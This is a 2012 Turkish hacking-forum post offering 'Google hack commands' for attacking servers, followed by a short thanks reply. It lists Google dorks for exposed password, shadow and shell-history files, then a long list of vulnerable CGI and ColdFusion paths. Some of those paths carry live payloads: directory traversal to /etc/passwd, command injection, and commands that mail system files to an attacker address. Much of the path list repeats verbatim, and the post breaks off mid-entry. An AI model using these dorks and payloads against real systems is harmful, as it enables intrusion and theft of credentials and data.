THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

GoogLe Hack Komutları // CoLTFeeT06

CoLTFeeT06 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
ANKARA
Yaş:
26
Mesajlar:
1.648
Konular:
247
Teşekkür (Etti):
96
Teşekkür (Aldı):
383
Ticaret:
(0) %
11-04-2012 19:20
#1
GoogLe Hack Komutları // CoLTFeeT06
GoogLe Hack Komutlar

Kod:
allinurl: "proxylist.txt"
allinurl: "proxy.txt"
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin" 
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
for IIS server exlpoit
allinurl: winnt/system32/ 
and u'll get many IIS server exploits
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts 
intitle:"index of" user_carts OR user_cart
_vti_inf.html 
service.pwd 
users.pwd 
authors.pwd 
administrators.pwd 
shtml.dll 
shtml.exe 
fpcount.exe 
default.asp 
showcode.asp 
sendmail.cfm 
getFile.cfm 
imagemap.exe 
test.bat 
msadcs.dll 
htimage.exe 
counter.exe 
browser.inc 
hello.bat 
default.asp\ 
dvwssr.dll 
cart32.exe 
add.exe 
index.jsp 
SessionServlet
glimpse 
man.sh 
AT-admin.cgi 
AT-generate.cgi 
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:"index of/ shop" +db
intitle:"index of/" +shopping_cart





/cd/../config/html/cnf_gi.htm 
/cfappman/index.cfm 
/cfdocs/cfmlsyntaxcheck.cfm 
/cfdocs/exampleapp/docs/sourcewindow.cfm 
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template= 
/cfdocs/exampleapp/email/application.cfm 
/cfdocs/exampleapp/email/getfile.cfm 
/cfdocs/exampleapp/email/getfile.cfm?filename=c: oot.ini 
/cfdocs/exampleapp/email/getfile.cfm?filename=c: oot.ini 
/cfdocs/exampleapp/publish/admin/addcontent.cfm 
/cfdocs/exampleapp/publish/admin/addcontent.cfm 
/cfdocs/exampleapp/publish/admin/application.cfm 
/cfdocs/examples/cvbeans/beaninfo.cfm 
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C: oot.ini 
/cfdocs/examples/httpclient/mainframeset.cfm 
/cfdocs/examples/parks/detail.cfm 
/cfdocs/expelval/displayopenedfile.cfm 
/cfdocs/expelval/exprcalc.cfm 
/cfdocs/expelval/openfile.cfm 
/cfdocs/expelval/sendmail.cfm 
/cfdocs/expelvel/openfile.cfm 
/cfdocs/expeval/displayopenedfile.cfm 
/cfdocs/expeval/eval.cfm 
/cfdocs/expeval/exprcalc.cfm 
/cfdocs/expeval/openfile.cfm 
/cfdocs/expeval/sendmail.cfm 
/cfdocs/expressions.cfm 
/cfdocs/MOLE.CFM 
/cfdocs/root.cfm 
/cfdocs/snippets/evaluate.cfm 
/cfdocs/snippets/fileexist.cfm 
/cfdocs/snippets/fileexists.cfm 
/cfdocs/snippets/gettempdirectory.cfm 
/cfdocs/snippets/setlocale.cfm 
/cfdocs/snippets/viewexample.cfm 
/cfdocs/snippets/viewexample.cfm?Tagname= 
/cfdocs/TOXIC.CFM 
/cfdocs/zero.cfm 
/CFIDE/Administrator/startstop.html 
/cfide/Administrator/startstop.html 
/cfmlsyntaxcheck.cfm 
/cfusion/cfapps/forums/data/forums.mdb 
/cfusion/cfapps/forums/forums_.mdb 
/cfusion/cfapps/security/data/realm.mdb 
/cfusion/cfapps/security/realm_.mdb 
/cfusion/database/cfexamples.mdb 
/cfusion/database/cfsnippets.mdb 
/cfusion/database/cypress.mdb 
/cfusion/database/smpolicy.mdb 
/cgi 
/cgi/ 
/cgi-bin 
/cgi-bin/ 
/cgibin 
/cgibin/ 
/cgi-bin/abuse.man?file=&domain=&script= 
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts 
/cgi-bin/add_ftp.cgi 
/cgi-bin/admin.cgi 
/cgi-bin/Admin_files/order.log 
/cgi-bin/adp 
/cgi-bin/adpassword.txt 
/cgi-bin/ads.cgi 
/cgi-bin/ads.setup 
/cgi-bin/af.cgi 
/cgi-bin/aglimpse 
/cgi-bin/alibaba.pl 
/cgi-bin/alibaba.pl|dir 
/cgi-bin/alibaba.pl|dir 
/cgi-bin/aliredir.exe 
/cgi-bin/allmanage/adp 
/cgi-bin/allmanage.cgi 
/cgi-bin/allmanage/k 
/cgi-bin/allmanage.pl 
/cgi-bin/allmanage/settings.cfg 
/cgi-bin/allmanageup.pl 
/cgi-bin/allmanage/userfile.dat 
/cgibin/amadmin.pl?setpasswd 
/cgi-bin/AnyBoard.cgi 
/cgi-bin/anyboard.cgi 
/cgi-bin/AnyForm 
/cgi-bin/AnyForm2 

/cgi-bin/archie 
/cgi-bin/architext_query.cgi 
/cgi-bin/architext_query.pl 
/cgi-bin/ash 
/cgi-bin/AT-admin.cgi 
/cgi-bin/AT-generate.cgi 
/cgi-bin/authorize/dbmfiles/users 
/cgi-bin/awl/auctionweaver.pl 
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&f romfile=Boot.ini 
/cgi-bin/ax-admin.cgi 
/cgi-bin/ax.cgi 
/cgi-bin/axs.cgi 
/cgi-bin/bash 
/cgi-bin/bb-ack.sh 
/cgi-bin/bb-dnbd 
/cgi-bin/bb-histlog.sh 
/cgi-bin/bb-hist.sh 
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts 
/cgi-bin/bb-hist.sh?HISTFILE=/home/* 
/cgi-bin/bb-hostsvc.sh 
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts 
/cgi-bin/bb-replog.sh 
/cgi-bin/bb-rep.sh 
/cgi-bin/bigconf.cgi 
/cgi-bin/bigconf.cgi all 
/cgi-bin/bizdb1-search.cgi 
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation*************| & f6=^a.*&action=searchdbdisplay 
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd 
/cgi-bin/bnbform 
/cgi-bin/bnbform.cgi 
/cgi-bin/bnbform.pl 
/cgi-bin/build.cgi 
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts 
/cgi-bin/cachemgr.cgi 
/cgi-bin/calendar 
/cgi-bin/calender_admin.pl 
/cgi-bin/calender.pl 
/cgi-bin/campas 
/cgi-bin/campas?%0acat%0a/etc/passwd%0a 
/cgi-bin/carbo.dll 
/cgi-bin/cart32.exe/expdate 
/cgi-bin/cart.pl 
/cgi-bin/cat 
/cgi-bin/cgiemail/uargg.txt 
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgi-lib.pl 
/cgi-bin/CGImail.exe 
/cgi-bin/cgimail.exe 
/cgi-bin/Cgitest.exe 
/cgi-bin/cgitest.exe 
/cgi-bin/cgiwrap 
/cgi-bin/cgiwrap 
/cgi-bin/classified.cgi 
/cgi-bin/classifieds 
/cgi-bin/classifieds.cgi 
/cgi-bin/clickresponder.pl 
/cgi-bin/cmd.exe 
/cgi-bin/.cobalt/siteUserMod.cgi 
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 
/cgi-bin/commander.pl 
/cgi-bin/cookmail 
/cgi-bin/cookmail/cookmail 
/cgi-bin/cookmail/cookmail.exe 
/cgi-bin/core 
/cgi-bin/Count.cgi 
/cgi-bin/count.cgi 
/cgi-bin/counterbanner 
/cgi-bin/counterbanner-ord 
/cgi-bin/counterfiglet 
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id 
/cgi-bin/counterfiglet-ord 
/cgi-bin/counter-ord 
/cgi-bin/cpmdaemon.cgi 
/cgi-bin/csh 
/cgi-bin/cvsweb.cgi 
/cgi-bin/data/nicks 
/cgi-bin/date 
/cgi-bin/day5datacopier.cgi 
/cgi-bin/day5datanotifier.cgi 
/cgi-bin/day5notifier 
/cgi-bin/db2www/library/********.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html 
/cgi-bin/dbman/db.cgi 
/cgi-bin/dbmlparser.exe 
/cgi-bin/dcforum/install_help.cgi 
/cgi-bin/dcguest.cgi 
/cgi-bin/dcguest/dcguest.cgi 
/cgi-bin/dfire.cgi 

/cgi-bin/dig.cgi 
/cgi-bin/disk2server.cgi 
/cgi-bin/dnewsweb 
/cgi-bin/donothing 
/cgi-bin/download.cgi 
/cgi-bin/dumpenv 
/cgi-bin/dumpenv.pl 
/cgi-bin/echo 
/cgi-bin/echo.bat 
/cgi-bin/edit.pl 
/cgi-bin/edit.pl 
/cgi-bin/environ.cgi 
/cgi-bin/environ.pl 
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation************* 
/cgi-bin/ews 
/cgi-bin/excite 
/cgi-bin/ezmlm-cgi 
/cgi-bin/faxsurvey 
/cgi-bin/faxsurvey?/bin/ls%20-a 
/cgi-bin/.fhp 
/cgi-bin/fi 
/cgi-bin/fi?/etc/passwd 
/cgi-bin/filemail 
/cgi-bin/filemail.cgi 
/cgi-bin/filemail.pl 
/cgi-bin/files.pl 
/cgi-bin/finger 
/cgi-bin/finger.cgi 
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls| 
/cgi-bin/finger?@localhost 
/cgi-bin/finger.pl 
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation* ***.com+ +etc%2Fpasswd 

/cgi-bin/flexform 
/cgi-bin/flexform.cgi 
/cgi-bin/foo.cmd?xxx&dir 
/cgi-bin/FormHandler.cgi 
/cgi-bin/formhandler.cgi 
/cgi-bin/FormMail.pl 
/cgi-bin/formmail.pl 
/cgi-bin/formprocessor.asp?MailTo=riotnation*************&M a ilFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp 
/cgi-bin/formto.pl 
/cgi-bin/fortune 
/cgi-bin/forum-admin.pl 
/cgi-bin/forumdisplay.cgi 
/cgi-bin/forum.pl 
/cgi-bin/fpcount.exe 
/cgi-bin/fpexplore.exe 
/cgi-bin/fpexplorer.exe 
/cgi-bin/ftpdiag.cgi 
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc 
/cgi-bin/futureforum.cgi 
/cgi-bin/gbook.cgi?_MAILTO=xx;ls 
/cgi-bin/get16.exe 
/cgi-bin/get32.exe 
/cgi-bin/get32.exe|dir 
/cgi-bin/getdoc.cgi 
/cgi-bin/gH.cgi 
/cgi-bin/glimpse 
/cgi-bin/guestadd.pl 
/cgi-bin/guestbook.cgi 
/cgi-bin/guestbook.pl 
/cgi-bin/GW5 
/cgi-bin/GW5/GWWEB.EXE 
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request 
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index 
/cgi-bin/GWWEB.EXE 
/cgi-bin/handler 
/cgi-bin/handler.cgi 
/cgi-bin/hello.bat 
/cgibin/htgrep/file=index.html&hdr=/etc/hosts 
/cgi-bin/htimage.exe 
/cgi-bin/htmldocs 
/cgi-bin/html_page?TEMPLATE=main 
/cgi-bin/htmlscript 
/cgi-bin/htmlscript?../../../../../../etc/passwd 
/cgi-bin/htsearch 
/cgi-bin/htsearch?exclude=%60%60 
/cgi-bin/icat 
/cgi-bin/iisadmpwd/achg.htr 
/cgi-bin/iisadmpwd/aexp2.htr 
/cgi-bin/iisadmpwd/aexp.htr 
/cgi-bin/iisadmpwd/anot.htr 
/cgi-bin/imagemap 
/cgi-bin/imagemap.c 
/cgi-bin/imagemap.exe 
/cgi-bin/imapcern.exe 
/cgi-bin/imapncsa.exe 
/cgi-bin/info2html
/cfdocs/exampleapp/publish/admin/application.cfm 
/cfdocs/examples/cvbeans/beaninfo.cfm 
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C: oot.ini 
/cfdocs/examples/httpclient/mainframeset.cfm 
/cfdocs/examples/parks/detail.cfm 
/cfdocs/expelval/displayopenedfile.cfm 
/cfdocs/expelval/exprcalc.cfm 
/cfdocs/expelval/openfile.cfm 
/cfdocs/expelval/sendmail.cfm 
/cfdocs/expelvel/openfile.cfm 
/cfdocs/expeval/displayopenedfile.cfm 
/cfdocs/expeval/eval.cfm 
/cfdocs/expeval/exprcalc.cfm 
/cfdocs/expeval/openfile.cfm 
/cfdocs/expeval/sendmail.cfm 
/cfdocs/expressions.cfm 
/cfdocs/MOLE.CFM 
/cfdocs/root.cfm 
/cfdocs/snippets/evaluate.cfm 
/cfdocs/snippets/fileexist.cfm 
/cfdocs/snippets/fileexists.cfm 
/cfdocs/snippets/gettempdirectory.cfm 
/cfdocs/snippets/setlocale.cfm 
/cfdocs/snippets/viewexample.cfm 
/cfdocs/snippets/viewexample.cfm?Tagname= 
/cfdocs/TOXIC.CFM 
/cfdocs/zero.cfm 
/CFIDE/Administrator/startstop.html 
/cfide/Administrator/startstop.html 
/cfmlsyntaxcheck.cfm 
/cfusion/cfapps/forums/data/forums.mdb 

/cfusion/cfapps/forums/forums_.mdb 
/cfusion/cfapps/security/data/realm.mdb 
/cfusion/cfapps/security/realm_.mdb 
/cfusion/database/cfexamples.mdb 
/cfusion/database/cfsnippets.mdb 
/cfusion/database/cypress.mdb 

/cfusion/database/smpolicy.mdb 
/cgi 
/cgi/ 
/cgi-bin 
/cgi-bin/ 
/cgibin 
/cgibin/ 
/cgi-bin/abuse.man?file=&domain=&script= 
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts 
/cgi-bin/add_ftp.cgi 
/cgi-bin/admin.cgi 
/cgi-bin/Admin_files/order.log 
/cgi-bin/adp 
/cgi-bin/adpassword.txt 
/cgi-bin/ads.cgi 
/cgi-bin/ads.setup 
/cgi-bin/af.cgi 
/cgi-bin/aglimpse 
/cgi-bin/alibaba.pl 
/cgi-bin/alibaba.pl|dir 
/cgi-bin/alibaba.pl|dir 
/cgi-bin/aliredir.exe 
/cgi-bin/allmanage/adp 
/cgi-bin/allmanage.cgi 
/cgi-bin/allmanage/k 
/cgi-bin/allmanage.pl 
/cgi-bin/allmanage/settings.cfg 
/cgi-bin/allmanageup.pl 
/cgi-bin/allmanage/userfile.dat 
/cgibin/amadmin.pl?setpasswd 
/cgi-bin/AnyBoard.cgi 
/cgi-bin/anyboard.cgi 
/cgi-bin/AnyForm 
/cgi-bin/AnyForm2 
/cgi-bin/archie 
/cgi-bin/architext_query.cgi 
/cgi-bin/architext_query.pl 
/cgi-bin/ash 
/cgi-bin/AT-admin.cgi 
/cgi-bin/AT-generate.cgi 
/cgi-bin/authorize/dbmfiles/users 
/cgi-bin/awl/auctionweaver.pl 
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&f romfile=Boot.ini 
/cgi-bin/ax-admin.cgi 
/cgi-bin/ax.cgi 
/cgi-bin/axs.cgi 
/cgi-bin/bash 
/cgi-bin/bb-ack.sh 
/cgi-bin/bb-dnbd 
/cgi-bin/bb-histlog.sh 
/cgi-bin/bb-hist.sh 
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts 
/cgi-bin/bb-hist.sh?HISTFILE=/home/* 
/cgi-bin/bb-hostsvc.sh 
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts 
/cgi-bin/bb-replog.sh 
/cgi-bin/bb-rep.sh 
/cgi-bin/bigconf.cgi 
/cgi-bin/bigconf.cgi all 
/cgi-bin/bizdb1-search.cgi 
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation*************| & f6=^a.*&action=searchdbdisplay 
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd 
/cgi-bin/bnbform 
/cgi-bin/bnbform.cgi 
/cgi-bin/bnbform.pl 
/cgi-bin/build.cgi 
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts 
/cgi-bin/cachemgr.cgi 
/cgi-bin/calendar 
/cgi-bin/calender_admin.pl 
/cgi-bin/calender.pl 
/cgi-bin/campas 
/cgi-bin/campas?%0acat%0a/etc/passwd%0a 
/cgi-bin/carbo.dll 
/cgi-bin/cart32.exe/expdate 
/cgi-bin/cart.pl 
/cgi-bin/cat 
/cgi-bin/cgiemail/uargg.txt 
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgi-lib.pl 
/cgi-bin/CGImail.exe 
/cgi-bin/cgimail.exe 
/cgi-bin/Cgitest.exe 
/cgi-bin/cgitest.exe 
/cgi-bin/cgiwrap 
/cgi-bin/cgiwrap 
/cgi-bin/classified.cgi 
/cgi-bin/classifieds 
/cgi-bin/classifieds.cgi 
/cgi-bin/clickresponder.pl 
/cgi-bin/cmd.exe 
/cgi-bin/.cobalt/siteUserMod.cgi 
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 
/cgi-bin/commander.pl 
/cgi-bin/cookmail 
/cgi-bin/cookmail/cookmail 
/cgi-bin/cookmail/cookmail.exe 
/cgi-bin/core 
/cgi-bin/Count.cgi 
/cgi-bin/count.cgi 
/cgi-bin/counterbanner 
/cgi-bin/counterbanner-ord 
/cgi-bin/counterfiglet 
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id 
/cgi-bin/counterfiglet-ord 
/cgi-bin/counter-ord 
/cgi-bin/cpmdaemon.cgi 
/cgi-bin/csh 
/cgi-bin/cvsweb.cgi 
/cgi-bin/data/nicks 
/cgi-bin/date 
/cgi-bin/day5datacopier.cgi 
/cgi-bin/day5datanotifier.cgi 
/cgi-bin/day5notifier 
/cgi-bin/db2www/library/********.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html 
/cgi-bin/dbman/db.cgi 
/cgi-bin/dbmlparser.exe 
/cgi-bin/dcforum/install_help.cgi 
/cgi-bin/dcguest.cgi 
/cgi-bin/dcguest/dcguest.cgi 
/cgi-bin/dfire.cgi 
/cgi-bin/dig.cgi 
/cgi-bin/disk2server.cgi 
/cgi-bin/dnewsweb 
/cgi-bin/donothing 
/cgi-bin/download.cgi 
/cgi-bin/dumpenv 
/cgi-bin/dumpenv.pl 
/cgi-bin/echo 
/cgi-bin/echo.bat 
/cgi-bin/edit.pl 
/cgi-bin/edit.pl 
/cgi-bin/environ.cgi 
/cgi-bin/environ.pl 
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation************* 
/cgi-bin/ews 
/cgi-bin/excite 
/cgi-bin/ezmlm-cgi 
/cgi-bin/faxsurvey 
/cgi-bin/faxsurvey?/bin/ls%20-a 
/cgi-bin/.fhp 
/cgi-bin/fi 
/cgi-bin/fi?/etc/passwd 
/cgi-bin/filemail 
/cgi-bin/filemail.cgi 
/cgi-bin/filemail.pl 
/cgi-bin/files.pl 
/cgi-bin/finger 
/cgi-bin/finger.cgi 
/cgi-bin
CoLTFeeT06
rohst - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
320
Konular:
15
Teşekkür (Etti):
20
Teşekkür (Aldı):
28
Ticaret:
(0) %
11-04-2012 19:21
#2
Programlama için saol.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler